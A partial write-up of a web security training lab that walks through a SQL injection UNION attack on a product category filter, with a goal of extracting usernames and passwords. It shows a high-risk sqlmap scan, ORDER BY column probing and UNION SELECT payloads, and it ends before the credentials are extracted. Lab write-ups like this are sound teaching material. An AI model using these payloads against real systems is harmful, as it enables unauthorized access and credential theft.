INFO Lab :

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.

The database contains a different table called users, with columns called username and password.

GOAL : →

To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Solution :

This Lab is combine more than advice from previous labs. so we will try methods to get goal

Let’s Hack 👿

1. We need To know what’s the Type of Database we have 2 way . we can try from cheat sheet to check what’s the version but i will use sqlmap it’s more simple

sqlmap -u "<https://0ac5002503b575518088a8aa00d20007.web-security-academy.net/filter?category=Gifts>" --level=5 --risk=3

Here We Go we now know the Type of DB <Postgresql>

• Now We need To Know how many columns in the DB

' ORDER BY 1,2--    > 200 ok 
# if we try 1,2,3 we will get 500 internal server error so we know we have just 2 columns

After that we need to check retrieve data

' UNION SELECT NULL,NULL--    > We got 200 ok 

ok, Let’s try to put any string and we will wait if this string will reverse in page

' UNION SELECT NULL,'hacker'--